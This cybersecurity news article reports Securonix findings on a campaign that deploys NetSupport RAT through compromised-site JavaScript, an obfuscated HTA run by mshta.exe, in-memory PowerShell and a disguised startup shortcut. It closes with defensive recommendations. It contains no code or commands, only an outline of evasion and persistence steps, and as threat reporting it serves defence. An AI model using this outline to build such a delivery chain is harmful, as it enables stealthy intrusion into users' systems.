Fileless Evasion: Multi-Stage Campaign Deploys NetSupport RAT via Obfuscated HTA
Researchers at Securonix have uncovered a multi-layered malware campaign designed to surreptitiously deploy the NetSupport RAT remote access tool. The attack unfolds through a series of carefully obfuscated stages, each engineered for maximum stealth and minimal forensic footprint on the compromised system.
The initial delivery begins with a JavaScript file embedded in compromised websites. This script features a complex structure and concealed logic that activates only under specific conditions. It can distinguish the user’s device type and detect whether the page is being visited for the first time, ensuring that the malicious routine executes only once per device. When the criteria are met, the script either injects an invisible frame into the page or retrieves the next stage in the chain—an HTML application.
At the second stage, an HTA file is launched as a covert application executed via the native Windows utility mshta.exe. This component extracts an encrypted PowerShell script, decrypts it through a multi-step process, and executes it directly in memory. As a result, the malicious activity leaves no persistent files on disk, significantly complicating detection by traditional antivirus solutions.
The final phase involves downloading and installing NetSupport RAT itself. The PowerShell script retrieves an archive, unpacks it into an inconspicuous directory, and launches the executable through a JScript wrapper. To maintain persistence, a shortcut masquerading as a Windows update component is placed in the system’s startup folder, allowing attackers to retain access even after a reboot.
NetSupport RAT, originally a legitimate remote administration tool, is frequently abused by threat actors for espionage, data theft, and full remote control. In this campaign, it grants attackers comprehensive command over infected systems, including keystroke capture, file manipulation, command execution, and proxy capabilities for lateral movement within the network.
According to analysts, the malicious infrastructure is actively maintained and regularly updated, with an architectural sophistication that points to highly skilled developers. The campaign primarily targets corporate users and spreads through decoy websites and concealed redirects. Despite its technical complexity, researchers have so far been unable to attribute the operation to any known cybercriminal group.
The campaign underscores the importance of blocking the execution of unsigned scripts, strengthening behavioral monitoring of system processes, closely inspecting startup directories, and analyzing anomalous network activity. Particular attention should be paid to restricting the use of mshta.exe and monitoring attempts to download files into %TEMP% and ProgramData directories.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
